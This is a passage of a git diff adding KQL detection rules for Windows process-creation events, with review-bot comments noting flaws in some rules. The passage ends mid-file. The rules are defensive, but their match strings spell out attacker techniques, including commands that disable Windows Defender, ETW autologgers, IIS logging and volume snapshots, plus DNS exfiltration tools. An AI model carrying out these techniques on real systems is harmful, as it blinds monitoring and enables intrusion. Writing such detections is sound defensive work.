2020-10-16 +// Level: medium +// Description: Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1518 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where (ProcessCommandLine contains "query" and ProcessCommandLine contains "\\software\\" and ProcessCommandLine contains "/v" and ProcessCommandLine contains "svcversion") and FolderPath endswith "\\reg.exe" \ No newline at end of file 
diff --git a/KQL/rules/windows/process_creation/detection_of_powershell_execution_via_sqlps_exe.kql b/KQL/rules/windows/process_creation/detection_of_powershell_execution_via_sqlps_exe.kql new file mode 100644 index 00000000..310d4825 --- /dev/null +++ b/KQL/rules/windows/process_creation/detection_of_powershell_execution_via_sqlps_exe.kql @@ -0,0 +1,13 @@ +// Title: Detection of PowerShell Execution via Sqlps.exe +// Author: Agro (@agro_sev) oscd.community +// Date: 2020-10-10 +// Level: medium +// Description: This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server. +// Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1127 +// False Positives: +// - Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe spawned by sqlagent.exe is a legitimate action. + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\sqlps.exe" or ((FolderPath endswith "\\sqlps.exe" or ProcessVersionInfoOriginalFileName =~ "sqlps.exe") and (not(InitiatingProcessFolderPath endswith "\\sqlagent.exe"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/devcon_execution_disabling_vmware_vmci_device.kql b/KQL/rules/windows/process_creation/devcon_execution_disabling_vmware_vmci_device.kql new file mode 100644 index 00000000..d0fa7173 --- /dev/null +++ b/KQL/rules/windows/process_creation/devcon_execution_disabling_vmware_vmci_device.kql 
@@ -0,0 +1,15 @@ +// Title: Devcon Execution Disabling VMware VMCI Device +// Author: Matt Anderson, Dray Agha, Anna Pham (Huntress) +// Date: 2026-01-02 +// Level: high +// Description: Detects execution of devcon.exe with commands that disable the VMware Virtual Machine Communication Interface (VMCI) device. +// This can be legitimate during VMware Tools troubleshooting or driver conflicts, but may also indicate malware attempting to hijack communication with the hardware via the VMCI device. +// This has been used to facilitate VMware ESXi vulnerability exploits to escape VMs and execute code on the ESXi host. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1543.003, attack.t1562.001 +// False Positives: +// - Legitimate VMware administration, Tools installation/uninstallation, or troubleshooting driver conflicts. +// - Automated scripts in virtualized environments for device cleanup. + +DeviceProcessEvents +| where ProcessCommandLine contains " disable " and (FolderPath endswith "\\devcon.exe" or ProcessVersionInfoOriginalFileName =~ "DevCon.exe") and (ProcessCommandLine contains "15AD&DEV_0740" or ProcessCommandLine contains "VMWVMCIHOSTDEV") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/devicecredentialdeployment_execution.kql b/KQL/rules/windows/process_creation/devicecredentialdeployment_execution.kql new file mode 100644 index 00000000..5f66dc20 --- /dev/null +++ b/KQL/rules/windows/process_creation/devicecredentialdeployment_execution.kql 
@@ -0,0 +1,12 @@ +// Title: DeviceCredentialDeployment Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-19 +// Level: medium +// Description: Detects the execution of DeviceCredentialDeployment to hide a process from view. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where FolderPath endswith "\\DeviceCredentialDeployment.exe" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/devtoolslauncher_exe_executes_specified_binary.kql b/KQL/rules/windows/process_creation/devtoolslauncher_exe_executes_specified_binary.kql new file mode 100644 index 00000000..db3e6a16 --- /dev/null +++ b/KQL/rules/windows/process_creation/devtoolslauncher_exe_executes_specified_binary.kql @@ -0,0 +1,12 @@ +// Title: Devtoolslauncher.exe Executes Specified Binary +// Author: Beyu Denis, oscd.community (rule), @_felamos (idea) +// Date: 2019-10-12 +// Level: high +// Description: The Devtoolslauncher.exe executes other binary +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate use of devtoolslauncher.exe by legitimate user + +DeviceProcessEvents +| where ProcessCommandLine contains "LaunchForDeploy" and FolderPath endswith "\\devtoolslauncher.exe" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/direct_autorun_keys_modification.kql b/KQL/rules/windows/process_creation/direct_autorun_keys_modification.kql new file mode 100644 index 00000000..2b5db063 --- /dev/null +++ b/KQL/rules/windows/process_creation/direct_autorun_keys_modification.kql 
@@ -0,0 +1,14 @@ +// Title: Direct Autorun Keys Modification +// Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community, Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2019-10-25 +// Level: medium +// Description: Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons. +// - Legitimate administrator sets up autorun keys for legitimate reasons. +// - Discord + +DeviceProcessEvents +| where ProcessCommandLine contains "add" and (ProcessCommandLine contains "\\software\\Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains "\\software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains "\\software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run" or ProcessCommandLine contains "\\software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit" or ProcessCommandLine contains "\\software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell" or ProcessCommandLine contains "\\software\\Microsoft\\Windows NT\\CurrentVersion\\Windows" or ProcessCommandLine contains "\\software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders" or ProcessCommandLine contains "\\system\\CurrentControlSet\\Control\\SafeBoot\\AlternateShell") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/directory_removal_via_rmdir.kql b/KQL/rules/windows/process_creation/directory_removal_via_rmdir.kql new file mode 100644 index 00000000..95270396 --- /dev/null +++ b/KQL/rules/windows/process_creation/directory_removal_via_rmdir.kql 
@@ -0,0 +1,13 @@ +// Title: Directory Removal Via Rmdir +// Author: frack113 +// Date: 2022-01-15 +// Level: low +// Description: Detects execution of the builtin "rmdir" command in order to delete directories. +// Adversaries may delete files left behind by the actions of their intrusion activity. +// Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. +// Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.004 + +DeviceProcessEvents +| where (ProcessCommandLine contains "/s" or ProcessCommandLine contains "/q") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") and ProcessCommandLine contains "rmdir" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/dirlister_execution.kql b/KQL/rules/windows/process_creation/dirlister_execution.kql new file mode 100644 index 00000000..acce8563 --- /dev/null +++ b/KQL/rules/windows/process_creation/dirlister_execution.kql @@ -0,0 +1,12 @@ +// Title: DirLister Execution +// Author: frack113 +// Date: 2022-08-20 +// Level: low +// Description: Detect the usage of "DirLister.exe" a utility for quickly listing folder or drive contents. It was seen used by BlackCat ransomware to create a list of accessible directories and files. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1083 +// False Positives: +// - Legitimate use by users + +DeviceProcessEvents +| where ProcessVersionInfoOriginalFileName =~ "DirLister.exe" or FolderPath endswith "\\DirLister.exe" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/disable_important_scheduled_task.kql b/KQL/rules/windows/process_creation/disable_important_scheduled_task.kql new file mode 100644 index 00000000..123f1198 
--- /dev/null +++ b/KQL/rules/windows/process_creation/disable_important_scheduled_task.kql @@ -0,0 +1,10 @@ +// Title: Disable Important Scheduled Task +// Author: frack113, Nasreddine Bencherchali (Nextron Systems), X__Junior +// Date: 2021-12-26 +// Level: high +// Description: Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1489 + +DeviceProcessEvents +| where (ProcessCommandLine contains "\\Windows\\BitLocker" or ProcessCommandLine contains "\\Windows\\ExploitGuard" or ProcessCommandLine contains "\\Windows\\ExploitGuard\\ExploitGuard MDM policy Refresh" or ProcessCommandLine contains "\\Windows\\SystemRestore\\SR" or ProcessCommandLine contains "\\Windows\\UpdateOrchestrator\\" or ProcessCommandLine contains "\\Windows\\Windows Defender\\" or ProcessCommandLine contains "\\Windows\\WindowsBackup\\" or ProcessCommandLine contains "\\Windows\\WindowsUpdate\\") and (ProcessCommandLine contains "/Change" and ProcessCommandLine contains "/TN" and ProcessCommandLine contains "/disable") and FolderPath endswith "\\schtasks.exe" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/disable_windows_defender_av_security_monitoring.kql b/KQL/rules/windows/process_creation/disable_windows_defender_av_security_monitoring.kql new file mode 100644 index 00000000..ae00516d --- /dev/null +++ b/KQL/rules/windows/process_creation/disable_windows_defender_av_security_monitoring.kql 
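Review bot: The literal `\\Windows\\ExploitGuard\\ExploitGuard MDM policy Refresh` in the `where` clause is subsumed by `\\Windows\\ExploitGuard` immediately before it, so it can never change the result; the sibling `delete_important_scheduled_task.kql` earlier in this diff lists only the short form. Dropping the longer literal, or trimming prefix-subsumed entries wherever the predicate is assembled, keeps the query minimal without altering what it matches.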
@@ -0,0 +1,12 @@ +// Title: Disable Windows Defender AV Security Monitoring +// Author: ok @securonix invrep-de, oscd.community, frack113 +// Date: 2020-10-12 +// Level: high +// Description: Detects attackers attempting to disable Windows Defender using Powershell +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice. + +DeviceProcessEvents +| where (((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "-DisableBehaviorMonitoring $true" or ProcessCommandLine contains "-DisableRuntimeMonitoring $true")) or ((FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") and ((ProcessCommandLine contains "delete" and ProcessCommandLine contains "WinDefend") or (ProcessCommandLine contains "config" and ProcessCommandLine contains "WinDefend" and ProcessCommandLine contains "start=disabled") or (ProcessCommandLine contains "stop" and ProcessCommandLine contains "WinDefend"))) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/disable_windows_iis_http_logging.kql b/KQL/rules/windows/process_creation/disable_windows_iis_http_logging.kql new file mode 100644 index 00000000..3fed0f88 --- /dev/null +++ b/KQL/rules/windows/process_creation/disable_windows_iis_http_logging.kql 
@@ -0,0 +1,10 @@ +// Title: Disable Windows IIS HTTP Logging +// Author: frack113 +// Date: 2022-01-09 +// Level: high +// Description: Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.002 + +DeviceProcessEvents +| where (ProcessCommandLine contains "set" and ProcessCommandLine contains "config" and ProcessCommandLine contains "section:httplogging" and ProcessCommandLine contains "dontLog:true") and (FolderPath endswith "\\appcmd.exe" or ProcessVersionInfoOriginalFileName =~ "appcmd.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/disabled_ie_security_features.kql b/KQL/rules/windows/process_creation/disabled_ie_security_features.kql new file mode 100644 index 00000000..58810f62 --- /dev/null +++ b/KQL/rules/windows/process_creation/disabled_ie_security_features.kql @@ -0,0 +1,10 @@ +// Title: Disabled IE Security Features +// Author: Florian Roth (Nextron Systems) +// Date: 2020-06-19 +// Level: high +// Description: Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 + +DeviceProcessEvents +| where (ProcessCommandLine contains " -name IEHarden " and ProcessCommandLine contains " -value 0 ") or (ProcessCommandLine contains " -name DEPOff " and ProcessCommandLine contains " -value 1 ") or (ProcessCommandLine contains " -name DisableFirstRunCustomize " and ProcessCommandLine contains " -value 2 ") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/disabled_volume_snapshots.kql b/KQL/rules/windows/process_creation/disabled_volume_snapshots.kql new file mode 100644 index 00000000..3156f377 --- /dev/null +++ b/KQL/rules/windows/process_creation/disabled_volume_snapshots.kql 
@@ -0,0 +1,12 @@ +// Title: Disabled Volume Snapshots +// Author: Florian Roth (Nextron Systems) +// Date: 2021-01-28 +// Level: high +// Description: Detects commands that temporarily turn off Volume Snapshots +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Legitimate administration + +DeviceProcessEvents +| where ProcessCommandLine contains "\\Services\\VSS\\Diag" and ProcessCommandLine contains "/d Disabled" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/disabling_windows_defender_wmi_autologger_session_via_reg_exe.kql b/KQL/rules/windows/process_creation/disabling_windows_defender_wmi_autologger_session_via_reg_exe.kql new file mode 100644 index 00000000..ba2035a6 --- /dev/null +++ b/KQL/rules/windows/process_creation/disabling_windows_defender_wmi_autologger_session_via_reg_exe.kql 
@@ -0,0 +1,14 @@ +// Title: Disabling Windows Defender WMI Autologger Session via Reg.exe +// Author: Matt Anderson (Huntress) +// Date: 2025-07-09 +// Level: high +// Description: Detects the use of reg.exe to disable the Event Tracing for Windows (ETW) Autologger session for Windows Defender API and Audit events. +// By setting the 'Start' value to '0' for the 'DefenderApiLogger' or 'DefenderAuditLogger' session, an attacker can prevent these critical security events +// from being logged, effectively blinding monitoring tools that rely on this data. This is a powerful defense evasion technique. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Highly unlikely + +DeviceProcessEvents +| where ((FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "add" and ProcessCommandLine contains "0") and (ProcessCommandLine contains "\\Control\\WMI\\Autologger\\DefenderApiLogger\\Start" or ProcessCommandLine contains "\\Control\\WMI\\Autologger\\DefenderAuditLogger\\Start")) and (not(ProcessCommandLine contains "0x00000001")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/discovery_of_a_system_time.kql b/KQL/rules/windows/process_creation/discovery_of_a_system_time.kql new file mode 100644 index 00000000..6507ec7c --- /dev/null +++ b/KQL/rules/windows/process_creation/discovery_of_a_system_time.kql 
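Review bot: The literals `\\Control\\WMI\\Autologger\\DefenderApiLogger\\Start` and `\\Control\\WMI\\Autologger\\DefenderAuditLogger\\Start` fold the value name into the key path, but `reg add` takes the value name as a separate argument, so the usual form `reg add HKLM\...\Autologger\DefenderApiLogger /v Start /t REG_DWORD /d 0 /f` contains neither literal and the rule would not fire on it; unless the source rule deliberately targets the `...\\Start` spelling, the literals should end at the session key and `Start` be matched as its own token. The value test `ProcessCommandLine contains "0"` is also a one-character token that the single `not(ProcessCommandLine contains "0x00000001")` exclusion only partly compensates for (a data argument such as `0x1` still contains `0` and is not excluded), so anchoring the data argument, e.g. `ProcessCommandLine matches regex "(?i)/d\\s+(0x0*)?0(\\s|$)"`, would be tighter and make the exclusion unnecessary. If these files are mechanically converted from upstream rules, the correction belongs in the source rule rather than in this output.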
@@ -0,0 +1,12 @@ +// Title: Discovery of a System Time +// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community +// Date: 2019-10-24 +// Level: low +// Description: Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1124 +// False Positives: +// - Legitimate use of the system utilities to discover system time for legitimate reason + +DeviceProcessEvents +| where (ProcessCommandLine contains "time" and (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe")) or (ProcessCommandLine contains "tz" and FolderPath endswith "\\w32tm.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/diskshadow_script_mode_execution_from_potential_suspicious_location.kql b/KQL/rules/windows/process_creation/diskshadow_script_mode_execution_from_potential_suspicious_location.kql new file mode 100644 index 00000000..c0c7f665 --- /dev/null +++ b/KQL/rules/windows/process_creation/diskshadow_script_mode_execution_from_potential_suspicious_location.kql 
@@ -0,0 +1,12 @@ +// Title: Diskshadow Script Mode - Execution From Potential Suspicious Location +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-09-15 +// Level: medium +// Description: Detects execution of "Diskshadow.exe" in script mode using the "/s" flag where the script is located in a potentially suspicious location. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - False positives may occur if you execute the script from one of the paths mentioned in the rule. Apply additional filters that fits your org needs. + +DeviceProcessEvents +| where (ProcessCommandLine contains "-s " or ProcessCommandLine contains "/s " or ProcessCommandLine contains "–s " or ProcessCommandLine contains "—s " or ProcessCommandLine contains "―s ") and (ProcessVersionInfoOriginalFileName =~ "diskshadow.exe" or FolderPath endswith "\\diskshadow.exe") and (ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\ProgramData\\" or ProcessCommandLine contains "\\Users\\Public\\") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/diskshadow_script_mode_uncommon_script_extension_execution.kql b/KQL/rules/windows/process_creation/diskshadow_script_mode_uncommon_script_extension_execution.kql new file mode 100644 index 00000000..8082d4a6 --- /dev/null +++ b/KQL/rules/windows/process_creation/diskshadow_script_mode_uncommon_script_extension_execution.kql 
@@ -0,0 +1,13 @@ +// Title: Diskshadow Script Mode - Uncommon Script Extension Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-09-15 +// Level: medium +// Description: Detects execution of "Diskshadow.exe" in script mode to execute an script with a potentially uncommon extension. +// Initial baselining of the allowed extension list is required. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - False postitve might occur with legitimate or uncommon extensions used internally. Initial baseline is required. + +DeviceProcessEvents +| where ((ProcessCommandLine contains "-s " or ProcessCommandLine contains "/s " or ProcessCommandLine contains "–s " or ProcessCommandLine contains "—s " or ProcessCommandLine contains "―s ") and (ProcessVersionInfoOriginalFileName =~ "diskshadow.exe" or FolderPath endswith "\\diskshadow.exe")) and (not(ProcessCommandLine contains ".txt")) \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/dism_remove_online_package.kql b/KQL/rules/windows/process_creation/dism_remove_online_package.kql new file mode 100644 index 00000000..028a7b0b --- /dev/null +++ b/KQL/rules/windows/process_creation/dism_remove_online_package.kql 
@@ -0,0 +1,12 @@
+// Title: Dism Remove Online Package
+// Author: frack113
+// Date: 2022-01-16
+// Level: medium
+// Description: Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Legitimate script
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "/Online" and ProcessCommandLine contains "/Disable-Feature") and FolderPath endswith "\\Dism.exe") or (FolderPath endswith "\\DismHost.exe" and (InitiatingProcessCommandLine contains "/Online" and InitiatingProcessCommandLine contains "/Disable-Feature"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/dll_execution_via_rasautou_exe.kql b/KQL/rules/windows/process_creation/dll_execution_via_rasautou_exe.kql
new file mode 100644
index 00000000..19aecc3b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/dll_execution_via_rasautou_exe.kql
@@ -0,0 +1,12 @@
+// Title: DLL Execution via Rasautou.exe
+// Author: Julia Fomina, oscd.community
+// Date: 2020-10-09
+// Level: medium
+// Description: Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -d " and ProcessCommandLine contains " -p ") and (FolderPath endswith "\\rasautou.exe" or ProcessVersionInfoOriginalFileName =~ "rasdlui.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/dll_execution_via_register_cimprovider_exe.kql b/KQL/rules/windows/process_creation/dll_execution_via_register_cimprovider_exe.kql
new file mode 100644
index 00000000..1aafa254
--- /dev/null
+++ b/KQL/rules/windows/process_creation/dll_execution_via_register_cimprovider_exe.kql
@@ -0,0 +1,10 @@
+// Title: DLL Execution Via Register-cimprovider.exe
+// Author: Ivan Dyachkov, Yulia Fomina, oscd.community
+// Date: 2020-10-07
+// Level: medium
+// Description: Detects using register-cimprovider.exe to execute arbitrary dll file.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-path" and ProcessCommandLine contains "dll") and FolderPath endswith "\\register-cimprovider.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/dll_loaded_via_certoc_exe.kql b/KQL/rules/windows/process_creation/dll_loaded_via_certoc_exe.kql
new file mode 100644
index 00000000..e3a7c280
--- /dev/null
+++ b/KQL/rules/windows/process_creation/dll_loaded_via_certoc_exe.kql
@@ -0,0 +1,10 @@
+// Title: DLL Loaded via CertOC.EXE
+// Author: Austin Songer @austinsonger
+// Date: 2021-10-23
+// Level: medium
+// Description: Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -LoadDLL " or ProcessCommandLine contains " /LoadDLL " or ProcessCommandLine contains " –LoadDLL " or ProcessCommandLine contains " —LoadDLL " or ProcessCommandLine contains " ―LoadDLL ") and (FolderPath endswith "\\certoc.exe" or ProcessVersionInfoOriginalFileName =~ "CertOC.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/dll_sideloading_by_vmware_xfer_utility.kql b/KQL/rules/windows/process_creation/dll_sideloading_by_vmware_xfer_utility.kql
new file mode 100644
index 00000000..e57b28c5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/dll_sideloading_by_vmware_xfer_utility.kql
@@ -0,0 +1,12 @@
+// Title: DLL Sideloading by VMware Xfer Utility
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-02
+// Level: high
+// Description: Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "\\VMwareXferlogs.exe" and (not(FolderPath startswith "C:\\Program Files\\VMware\\"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/dllhost_exe_execution_anomaly.kql b/KQL/rules/windows/process_creation/dllhost_exe_execution_anomaly.kql
new file mode 100644
index 00000000..7d169368
--- /dev/null
+++ b/KQL/rules/windows/process_creation/dllhost_exe_execution_anomaly.kql
@@ -0,0 +1,12 @@
+// Title: Dllhost.EXE Execution Anomaly
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-27
+// Level: high
+// Description: Detects a "dllhost" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ((ProcessCommandLine in~ ("dllhost.exe", "dllhost")) and FolderPath endswith "\\dllhost.exe") and (not(isnull(ProcessCommandLine)))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/dllunregisterserver_function_call_via_msiexec_exe.kql b/KQL/rules/windows/process_creation/dllunregisterserver_function_call_via_msiexec_exe.kql
new file mode 100644
index 00000000..30d51c9c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/dllunregisterserver_function_call_via_msiexec_exe.kql
@@ -0,0 +1,10 @@
+// Title: DllUnregisterServer Function Call Via Msiexec.EXE
+// Author: frack113
+// Date: 2022-04-24
+// Level: medium
+// Description: Detects MsiExec loading a DLL and calling its DllUnregisterServer function
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.007
+
+DeviceProcessEvents
+| where ProcessCommandLine contains ".dll" and (ProcessCommandLine contains " -z " or ProcessCommandLine contains " /z " or ProcessCommandLine contains " –z " or ProcessCommandLine contains " —z " or ProcessCommandLine contains " ―z ") and (FolderPath endswith "\\msiexec.exe" or ProcessVersionInfoOriginalFileName =~ "\\msiexec.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/dns_exfiltration_and_tunneling_tools_execution.kql b/KQL/rules/windows/process_creation/dns_exfiltration_and_tunneling_tools_execution.kql
new file mode 100644
index 00000000..37691026
--- /dev/null
+++ b/KQL/rules/windows/process_creation/dns_exfiltration_and_tunneling_tools_execution.kql
@@ -0,0 +1,12 @@
+// Title: DNS Exfiltration and Tunneling Tools Execution
+// Author: Daniil Yugoslavskiy, oscd.community
+// Date: 2019-10-24
+// Level: high
+// Description: Well-known DNS Exfiltration tools execution
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1048.001, attack.command-and-control, attack.t1071.004, attack.t1132.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "\\iodine.exe" or FolderPath contains "\\dnscat2"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/domain_trust_discovery_via_dsquery.kql b/KQL/rules/windows/process_creation/domain_trust_discovery_via_dsquery.kql
new file mode 100644
index 00000000..e0fdf059
--- /dev/null
+++ b/KQL/rules/windows/process_creation/domain_trust_discovery_via_dsquery.kql
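Review bot: `ProcessVersionInfoOriginalFileName =~ "\\msiexec.exe"` in the `| where` line of dllunregisterserver_function_call_via_msiexec_exe.kql cannot match: the OriginalFileName version-resource field holds a bare file name, so the leading path separator makes this alternative dead and the rule effectively rests on the FolderPath branch alone. Every other rule in this batch compares that field against a bare name (for example `ProcessVersionInfoOriginalFileName =~ "reg.exe"`), so the line should read `ProcessVersionInfoOriginalFileName =~ "msiexec.exe"`. Whether the stray separator originates in the upstream Sigma rule or in the converter is not visible here; since these files are generated by the workflow, the correction belongs in that source rather than a hand edit of the output.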
@@ -0,0 +1,12 @@
+// Title: Domain Trust Discovery Via Dsquery
+// Author: E.M. Anhaus, Tony Lambert, oscd.community, omkar72
+// Date: 2019-10-24
+// Level: medium
+// Description: Detects execution of "dsquery.exe" for domain trust discovery
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1482
+// False Positives:
+// - Legitimate use of the utilities by legitimate user for legitimate reason
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "trustedDomain" and (FolderPath endswith "\\dsquery.exe" or ProcessVersionInfoOriginalFileName =~ "dsquery.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/driver_dll_installation_via_odbcconf_exe.kql b/KQL/rules/windows/process_creation/driver_dll_installation_via_odbcconf_exe.kql
new file mode 100644
index 00000000..2c7dc135
--- /dev/null
+++ b/KQL/rules/windows/process_creation/driver_dll_installation_via_odbcconf_exe.kql
@@ -0,0 +1,12 @@
+// Title: Driver/DLL Installation Via Odbcconf.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-22
+// Level: medium
+// Description: Detects execution of "odbcconf" with "INSTALLDRIVER" which installs a new ODBC driver. Attackers abuse this to install and run malicious DLLs.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.008
+// False Positives:
+// - Legitimate driver DLLs being registered via "odbcconf" will generate false positives. Investigate the path of the DLL and its contents to determine if the action is authorized.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "INSTALLDRIVER " and ProcessCommandLine contains ".dll") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/driverquery_exe_execution.kql b/KQL/rules/windows/process_creation/driverquery_exe_execution.kql
new file mode 100644
index 00000000..30e251e4
--- /dev/null
+++ b/KQL/rules/windows/process_creation/driverquery_exe_execution.kql
@@ -0,0 +1,12 @@
+// Title: DriverQuery.EXE Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-19
+// Level: medium
+// Description: Detect usage of the "driverquery" utility. Which can be used to perform reconnaissance on installed drivers
+// MITRE Tactic: Discovery
+// Tags: attack.discovery
+// False Positives:
+// - Legitimate use by third party tools in order to investigate installed drivers
+
+DeviceProcessEvents
